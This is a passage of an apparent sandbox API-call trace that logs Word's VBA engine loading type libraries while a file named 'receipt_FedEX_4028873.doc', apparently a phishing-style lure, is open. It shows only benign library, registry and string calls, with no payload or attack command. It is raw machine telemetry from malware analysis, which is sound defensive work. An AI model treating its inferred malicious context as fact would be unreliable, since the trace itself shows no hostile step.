lpsz="{00020430-0000-0000-C000-000000000046}", pclsid=0x186810 | out: pclsid=0x186810*(Data1=0x20430, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0040.995] wcsncpy_s (in: _Destination=0x6b930f8, _SizeInWords=0x5f, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\WINDOWS\\system32\\stdole2.tlb#OLE Automation", _MaxCount=0x30 | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#") returned 0x0 [0040.995] wcscpy_s (in: _Destination=0x6b93158, _SizeInWords=0x2f, _Source="C:\\WINDOWS\\system32\\stdole2.tlb" | out: _Destination="C:\\WINDOWS\\system32\\stdole2.tlb") returned 0x0 [0040.995] wcscpy_s (in: _Destination=0x6b93196, _SizeInWords=0x10, _Source="#OLE Automation" | out: _Destination="#OLE Automation") returned 0x0 [0040.995] IMalloc:Realloc (This=0x7feffc15380, pv=0x6bbc040, cb=0x680) returned 0x6bd2d20 [0040.995] wcscpy_s (in: _Destination=0x6bd2fe0, _SizeInWords=0x5f, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\WINDOWS\\system32\\stdole2.tlb#OLE Automation" | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\WINDOWS\\system32\\stdole2.tlb#OLE Automation") returned 0x0 [0040.995] wcsncpy_s (in: _Destination=0x186460, _SizeInWords=0x108, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\WINDOWS\\system32\\stdole2.tlb#OLE Automation", _MaxCount=0x106 | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\WINDOWS\\system32\\stdole2.tlb#OLE Automation") returned 0x0 [0040.995] CharLowerBuffW (in: lpsz="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\WINDOWS\\system32\\stdole2.tlb#OLE Automation", cchLength=0x5e | out: lpsz="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation") returned 0x5e [0040.995] IMalloc:Alloc (This=0x7feffc15380, cb=0xbe) returned 0x6b97cd0 [0040.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation", cchWideChar=95, lpMultiByteStr=0x6b97cd0, cbMultiByte=190, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation", lpUsedDefaultChar=0x0) returned 95 [0040.995] IMalloc:Free (This=0x7feffc15380, pv=0x6b97cd0) [0040.995] wcscpy_s (in: _Destination=0x3e62a78, _SizeInWords=0x5f, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\WINDOWS\\system32\\stdole2.tlb#OLE Automation" | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\WINDOWS\\system32\\stdole2.tlb#OLE Automation") returned 0x0 [0040.995] wcsncpy_s (in: _Destination=0x1864a0, _SizeInWords=0x108, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\WINDOWS\\system32\\stdole2.tlb#OLE Automation", _MaxCount=0x106 | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\WINDOWS\\system32\\stdole2.tlb#OLE Automation") returned 0x0 [0040.995] CharLowerBuffW (in: lpsz="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\WINDOWS\\system32\\stdole2.tlb#OLE Automation", cchLength=0x5e | out: lpsz="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation") returned 0x5e [0040.995] IMalloc:Alloc (This=0x7feffc15380, cb=0xbe) returned 0x6b97cd0 [0040.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation", cchWideChar=95, lpMultiByteStr=0x6b97cd0, cbMultiByte=190, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{00020430-0000-0000-c000-000000000046}#2.0#0#c:\\windows\\system32\\stdole2.tlb#ole automation", lpUsedDefaultChar=0x0) returned 95 [0040.995] IMalloc:Free (This=0x7feffc15380, pv=0x6b97cd0) [0040.995] wcsncpy_s (in: _Destination=0x186460, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc") returned 0x0 [0040.995] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", cchLength=0x36 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\receipt_fedex_4028873.doc") returned 0x36 [0040.995] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\receipt_fedex_4028873.doc", cchWideChar=55, lpMultiByteStr=0x186390, cbMultiByte=110, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\receipt_fedex_4028873.doc", lpUsedDefaultChar=0x0) returned 55 [0040.995] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned -4 [0040.995] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc") returned 0 [0040.996] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="stdole", cchWideChar=7, lpMultiByteStr=0x186740, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="stdole", lpUsedDefaultChar=0x0) returned 7 [0040.996] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="stdole") returned 0x106093 [0040.996] strcpy_s (in: _Dst=0x186520, _DstSize=0x7, _Src="stdole" | out: _Dst="stdole") returned 0x0 [0040.996] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x186520, cbMultiByte=7, lpWideCharStr=0x186370, cchWideChar=7 | out: lpWideCharStr="stdole") returned 7 [0040.996] IUnknown:AddRef (This=0x6990960) returned 0x3 [0040.996] ITypeLib:RemoteIsName (in: This=0x6990960, szNameBuf="stdole", lHashVal=0x106093, pfName=0x186440, pBstrLibName=0x186370 | out: pfName=0x186440*=0, pBstrLibName=0x186370) returned 0x0 [0040.996] IUnknown:Release (This=0x6990960) returned 0x2 [0040.996] IUnknown:AddRef (This=0x6992850) returned 0x3 [0040.996] ITypeLib:RemoteIsName (in: This=0x6992850, szNameBuf="stdole", lHashVal=0x106093, pfName=0x186440, pBstrLibName=0x186370 | out: pfName=0x186440*=0, pBstrLibName=0x186370) returned 0x0 [0040.996] IUnknown:Release (This=0x6992850) returned 0x2 [0040.996] IMalloc:Alloc (This=0x7feffc15380, cb=0x208) returned 0x6ad5eb0 [0040.996] wcscpy_s (in: _Destination=0x6b930f8, _SizeInWords=0x5f, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\WINDOWS\\system32\\stdole2.tlb#OLE Automation" | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\WINDOWS\\system32\\stdole2.tlb#OLE Automation") returned 0x0 [0040.996] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="TypeLib", phkResult=0x185b20 | out: phkResult=0x185b20*=0x9ea) returned 0x0 [0040.996] RegOpenKeyW (in: hKey=0x9ea, lpSubKey="{00020430-0000-0000-C000-000000000046}", phkResult=0x185b18 | out: phkResult=0x185b18*=0x9f2) returned 0x0 [0040.996] RegEnumKeyW (in: hKey=0x9f2, dwIndex=0x0, lpName=0x185b48, cchName=0xa | out: lpName="1.0") returned 0x0 [0040.997] RegEnumKeyW (in: hKey=0x9f2, dwIndex=0x1, lpName=0x185b48, cchName=0xa | out: lpName="2.0") returned 0x0 [0040.997] wcscpy_s (in: _Destination=0x185b30, _SizeInWords=0xa, _Source="2.0" | out: _Destination="2.0") returned 0x0 [0040.997] RegOpenKeyW (in: hKey=0x9f2, lpSubKey="2.0", phkResult=0x185bd8 | out: phkResult=0x185bd8*=0x9ee) returned 0x0 [0040.997] _ultoa_s (in: _Val=0x0, _DstBuf=0x185b50, _Size=0xa, _Radix=16 | out: _DstBuf="0") returned 0x0 [0040.997] RegOpenKeyA (in: hKey=0x9ee, lpSubKey="0", phkResult=0x185b40 | out: phkResult=0x185b40*=0x9f6) returned 0x0 [0040.997] RegOpenKeyW (in: hKey=0x9f6, lpSubKey="win64", phkResult=0x185b48 | out: phkResult=0x185b48*=0xa02) returned 0x0 [0040.998] RegCloseKey (hKey=0xa02) returned 0x0 [0040.998] RegCloseKey (hKey=0x9f6) returned 0x0 [0040.998] _ultow_s (in: _Value=0x0, _Buffer=0x185be0, _BufferCount=0x9, _Radix=16 | out: _Buffer="0") returned 0x0 [0040.998] RegOpenKeyW (in: hKey=0x9ee, lpSubKey="0", phkResult=0x185bb8 | out: phkResult=0x185bb8*=0x9f6) returned 0x0 [0040.998] RegQueryValueW (in: hKey=0x9f6, lpSubKey="win64", lpData=0x185c00, lpcbData=0x185bb4 | out: lpData="C:\\Windows\\system32\\stdole2.tlb", lpcbData=0x185bb4) returned 0x0 [0040.998] wcscpy_s (in: _Destination=0x6ad5eb0, _SizeInWords=0x104, _Source="C:\\Windows\\system32\\stdole2.tlb" | out: _Destination="C:\\Windows\\system32\\stdole2.tlb") returned 0x0 [0040.998] RegCloseKey (hKey=0x9f6) returned 0x0 [0040.999] RegCloseKey (hKey=0x9ee) returned 0x0 [0040.999] RegCloseKey (hKey=0x9f2) returned 0x0 [0040.999] RegCloseKey (hKey=0x9ea) returned 0x0 [0040.999] LoadTypeLib (in: szFile="C:\\Windows\\system32\\stdole2.tlb", pptlib=0x186228*=0x0 | out: pptlib=0x186228*=0x6992df0) returned 0x0 [0040.999] IUnknown:QueryInterface (in: This=0x6992df0, riid=0x7fee45d5c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x186028 | out: ppvObject=0x186028*=0x0) returned 0x80004002 [0040.999] ITypeLib:RemoteGetLibAttr (in: This=0x6992df0, ppTLibAttr=0x186020, pDummy=0x10 | out: ppTLibAttr=0x186020, pDummy=0x10) returned 0x0 [0040.999] ITypeLib:RemoteGetDocumentation (in: This=0x6992df0, index=-1, refPtrFlags=0x0, pbstrName=0x186018, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x6b93156 | out: pbstrName=0x186018*="OLE Automation", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x6b93156) returned 0x0 [0040.999] StringFromGUID2 (in: rguid=0x3f07bd0*(Data1=0x20430, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), lpsz=0x186040, cchMax=39 | out: lpsz="{00020430-0000-0000-C000-000000000046}") returned 39 [0040.999] _ultow_s (in: _Value=0x2, _Buffer=0x185f8a, _BufferCount=0x10, _Radix=16 | out: _Buffer="2") returned 0x0 [0040.999] _ultow_s (in: _Value=0x0, _Buffer=0x185f8e, _BufferCount=0xe, _Radix=16 | out: _Buffer="0") returned 0x0 [0040.999] _ultow_s (in: _Value=0x0, _Buffer=0x185f92, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 [0040.999] wcscpy_s (in: _Destination=0x6b931d8, _SizeInWords=0x5f, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0040.999] wcscpy_s (in: _Destination=0x6b931de, _SizeInWords=0x5c, _Source="{00020430-0000-0000-C000-000000000046}" | out: _Destination="{00020430-0000-0000-C000-000000000046}") returned 0x0 [0040.999] wcscpy_s (in: _Destination=0x6b9322a, _SizeInWords=0x36, _Source="#2.0#0#" | out: _Destination="#2.0#0#") returned 0x0 [0040.999] wcscpy_s (in: _Destination=0x6b93238, _SizeInWords=0x2f, _Source="C:\\Windows\\system32\\stdole2.tlb" | out: _Destination="C:\\Windows\\system32\\stdole2.tlb") returned 0x0 [0040.999] wcscpy_s (in: _Destination=0x6b93278, _SizeInWords=0xf, _Source="OLE Automation" | out: _Destination="OLE Automation") returned 0x0 [0040.999] ITypeLib:LocalReleaseTLibAttr (This=0x6992df0) returned 0x0 [0040.999] wcscpy_s (in: _Destination=0x6ad5eb0, _SizeInWords=0x104, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation" | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 0x0 [0041.000] wcscpy_s (in: _Destination=0x6bd30a0, _SizeInWords=0x5f, _Source="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation" | out: _Destination="*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation") returned 0x0 [0041.000] IMalloc:Free (This=0x7feffc15380, pv=0x6ad5eb0) [0041.000] IUnknown:AddRef (This=0x6992df0) returned 0x4 [0041.000] IUnknown:QueryInterface (in: This=0x6992df0, riid=0x7fee45d85a0*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x186288 | out: ppvObject=0x186288*=0x0) returned 0x80004002 [0041.000] ITypeLib:RemoteIsName (in: This=0x6992df0, szNameBuf="stdole", lHashVal=0x106093, pfName=0x186440, pBstrLibName=0x186370 | out: pfName=0x186440*=0, pBstrLibName=0x186370) returned 0x0 [0041.000] IUnknown:Release (This=0x6992df0) returned 0x3 [0041.000] IMalloc:Alloc (This=0x7feffc15380, cb=0x24) returned 0x68f0a50 [0041.000] IMalloc:Free (This=0x7feffc15380, pv=0x6b82390) [0041.000] IMalloc:Alloc (This=0x7feffc15380, cb=0x20) returned 0x68f0ae0 [0041.000] IMalloc:Realloc (This=0x7feffc15380, pv=0x68f0ae0, cb=0x50) returned 0x6a64b00 [0041.000] IMalloc:Free (This=0x7feffc15380, pv=0x68f0a50) [0041.001] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=-1, lpMultiByteStr=0x1866b0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0041.001] _stat64i32 (in: _FileName="Normal", _Stat=0x186858 | out: _Stat=0x186858) returned -1 [0041.002] wcscpy_s (in: _Destination=0x68f0aee, _SizeInWords=0x7, _Source="Normal" | out: _Destination="Normal") returned 0x0 [0041.002] wcscpy_s (in: _Destination=0x6bd3008, _SizeInWords=0xa, _Source="*\\CNormal" | out: _Destination="*\\CNormal") returned 0x0 [0041.002] wcsncpy_s (in: _Destination=0x186460, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0041.002] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0041.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x186390, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0041.002] IMalloc:Realloc (This=0x7feffc15380, pv=0x3e62720, cb=0x880) returned 0x6bd33b0 [0041.002] wcscpy_s (in: _Destination=0x6bd37f8, _SizeInWords=0xa, _Source="*\\CNormal" | out: _Destination="*\\CNormal") returned 0x0 [0041.002] wcsncpy_s (in: _Destination=0x1864a0, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0041.002] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0041.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x1863d0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0041.002] wcsncpy_s (in: _Destination=0x186460, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc") returned 0x0 [0041.002] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", cchLength=0x36 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\receipt_fedex_4028873.doc") returned 0x36 [0041.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\receipt_fedex_4028873.doc", cchWideChar=55, lpMultiByteStr=0x186390, cbMultiByte=110, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\receipt_fedex_4028873.doc", lpUsedDefaultChar=0x0) returned 55 [0041.002] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned -4 [0041.002] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc") returned 0 [0041.002] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Normal", cchWideChar=7, lpMultiByteStr=0x186740, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Normal", lpUsedDefaultChar=0x0) returned 7 [0041.002] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Normal") returned 0x10d8df [0041.002] strcpy_s (in: _Dst=0x186520, _DstSize=0x7, _Src="Normal" | out: _Dst="Normal") returned 0x0 [0041.003] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x186520, cbMultiByte=7, lpWideCharStr=0x186370, cchWideChar=7 | out: lpWideCharStr="Normal") returned 7 [0041.003] IUnknown:AddRef (This=0x6990960) returned 0x3 [0041.003] ITypeLib:RemoteIsName (in: This=0x6990960, szNameBuf="Normal", lHashVal=0x10d8df, pfName=0x186440, pBstrLibName=0x186370 | out: pfName=0x186440*=0, pBstrLibName=0x186370) returned 0x0 [0041.003] IUnknown:Release (This=0x6990960) returned 0x2 [0041.003] IUnknown:AddRef (This=0x6992850) returned 0x3 [0041.003] ITypeLib:RemoteIsName (in: This=0x6992850, szNameBuf="Normal", lHashVal=0x10d8df, pfName=0x186440, pBstrLibName=0x186370 | out: pfName=0x186440*=0, pBstrLibName=0x186370) returned 0x0 [0041.003] IUnknown:Release (This=0x6992850) returned 0x2 [0041.003] IUnknown:AddRef (This=0x6992df0) returned 0x4 [0041.003] ITypeLib:RemoteIsName (in: This=0x6992df0, szNameBuf="Normal", lHashVal=0x10d8df, pfName=0x186440, pBstrLibName=0x186370 | out: pfName=0x186440*=0, pBstrLibName=0x186370) returned 0x0 [0041.003] IUnknown:Release (This=0x6992df0) returned 0x3 [0041.003] IMalloc:Alloc (This=0x7feffc15380, cb=0x30) returned 0x697c110 [0041.003] IMalloc:Free (This=0x7feffc15380, pv=0x6a64b00) [0041.003] IMalloc:Alloc (This=0x7feffc15380, cb=0x20) returned 0x68f0b40 [0041.003] IMalloc:Realloc (This=0x7feffc15380, pv=0x68f0b40, cb=0x5c) returned 0x6ad2340 [0041.003] IMalloc:Free (This=0x7feffc15380, pv=0x697c110) [0041.003] IMalloc:Alloc (This=0x7feffc15380, cb=0x94) returned 0x6baa970 [0041.003] IMalloc:Free (This=0x7feffc15380, pv=0x6baa970) [0041.003] CLSIDFromString (in: lpsz="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}", pclsid=0x186810 | out: pclsid=0x186810*(Data1=0x2df8d04c, Data2=0x5bfa, Data3=0x101b, Data4=([0]=0xbd, [1]=0xe5, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x44, [6]=0xde, [7]=0x52))) returned 0x0 [0041.004] IMalloc:Alloc (This=0x7feffc15380, cb=0x80) returned 0x6b9d390 [0041.004] _ultow_s (in: _Value=0x2, _Buffer=0x18669a, _BufferCount=0x10, _Radix=16 | out: _Buffer="2") returned 0x0 [0041.004] _ultow_s (in: _Value=0x8, _Buffer=0x18669e, _BufferCount=0xe, _Radix=16 | out: _Buffer="8") returned 0x0 [0041.004] _ultow_s (in: _Value=0x0, _Buffer=0x1866a2, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 [0041.004] wcscpy_s (in: _Destination=0x6a96eb8, _SizeInWords=0x95, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0041.004] wcscpy_s (in: _Destination=0x6a96ebe, _SizeInWords=0x92, _Source="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}" | out: _Destination="{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}") returned 0x0 [0041.004] wcscpy_s (in: _Destination=0x6a96f0a, _SizeInWords=0x6c, _Source="#2.8#0#" | out: _Destination="#2.8#0#") returned 0x0 [0041.004] wcscpy_s (in: _Destination=0x6a96f18, _SizeInWords=0x65, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE12\\MSO.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE12\\MSO.DLL") returned 0x0 [0041.004] wcscpy_s (in: _Destination=0x6a96f98, _SizeInWords=0x25, _Source="Microsoft Office 12.0 Object Library" | out: _Destination="Microsoft Office 12.0 Object Library") returned 0x0 [0041.004] IMalloc:Free (This=0x7feffc15380, pv=0x6b9d390) [0041.004] wcsncpy_s (in: _Destination=0x3ea0b88, _SizeInWords=0x95, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE12\\MSO.DLL#Microsoft Office 12.0 Object Library", _MaxCount=0x30 | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#") returned 0x0 [0041.004] wcscpy_s (in: _Destination=0x3ea0be8, _SizeInWords=0x65, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE12\\MSO.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE12\\MSO.DLL") returned 0x0 [0041.004] wcscpy_s (in: _Destination=0x3ea0c66, _SizeInWords=0x26, _Source="#Microsoft Office 12.0 Object Library" | out: _Destination="#Microsoft Office 12.0 Object Library") returned 0x0 [0041.004] wcscpy_s (in: _Destination=0x6bd3160, _SizeInWords=0x95, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE12\\MSO.DLL#Microsoft Office 12.0 Object Library" | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE12\\MSO.DLL#Microsoft Office 12.0 Object Library") returned 0x0 [0041.004] wcsncpy_s (in: _Destination=0x186460, _SizeInWords=0x108, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE12\\MSO.DLL#Microsoft Office 12.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE12\\MSO.DLL#Microsoft Office 12.0 Object Library") returned 0x0 [0041.004] CharLowerBuffW (in: lpsz="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE12\\MSO.DLL#Microsoft Office 12.0 Object Library", cchLength=0x94 | out: lpsz="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office12\\mso.dll#microsoft office 12.0 object library") returned 0x94 [0041.004] IMalloc:Alloc (This=0x7feffc15380, cb=0x12a) returned 0x6a6ed80 [0041.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office12\\mso.dll#microsoft office 12.0 object library", cchWideChar=149, lpMultiByteStr=0x6a6ed80, cbMultiByte=298, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office12\\mso.dll#microsoft office 12.0 object library", lpUsedDefaultChar=0x0) returned 149 [0041.004] IMalloc:Free (This=0x7feffc15380, pv=0x6a6ed80) [0041.004] wcscpy_s (in: _Destination=0x6bd3840, _SizeInWords=0x95, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE12\\MSO.DLL#Microsoft Office 12.0 Object Library" | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE12\\MSO.DLL#Microsoft Office 12.0 Object Library") returned 0x0 [0041.004] wcsncpy_s (in: _Destination=0x1864a0, _SizeInWords=0x108, _Source="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE12\\MSO.DLL#Microsoft Office 12.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE12\\MSO.DLL#Microsoft Office 12.0 Object Library") returned 0x0 [0041.004] CharLowerBuffW (in: lpsz="*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE12\\MSO.DLL#Microsoft Office 12.0 Object Library", cchLength=0x94 | out: lpsz="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office12\\mso.dll#microsoft office 12.0 object library") returned 0x94 [0041.004] IMalloc:Alloc (This=0x7feffc15380, cb=0x12a) returned 0x6a6ed80 [0041.004] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office12\\mso.dll#microsoft office 12.0 object library", cchWideChar=149, lpMultiByteStr=0x6a6ed80, cbMultiByte=298, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{2df8d04c-5bfa-101b-bde5-00aa0044de52}#2.8#0#c:\\program files\\common files\\microsoft shared\\office12\\mso.dll#microsoft office 12.0 object library", lpUsedDefaultChar=0x0) returned 149 [0041.004] IMalloc:Free (This=0x7feffc15380, pv=0x6a6ed80) [0041.005] wcsncpy_s (in: _Destination=0x186460, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc") returned 0x0 [0041.005] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\receipt_FedEX_4028873.doc", cchLength=0x36 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\receipt_fedex_4028873.doc") returned 0x36 [0041.005] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\receipt_fedex_4028873.doc", cchWideChar=55, lpMultiByteStr=0x186390, cbMultiByte=110, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 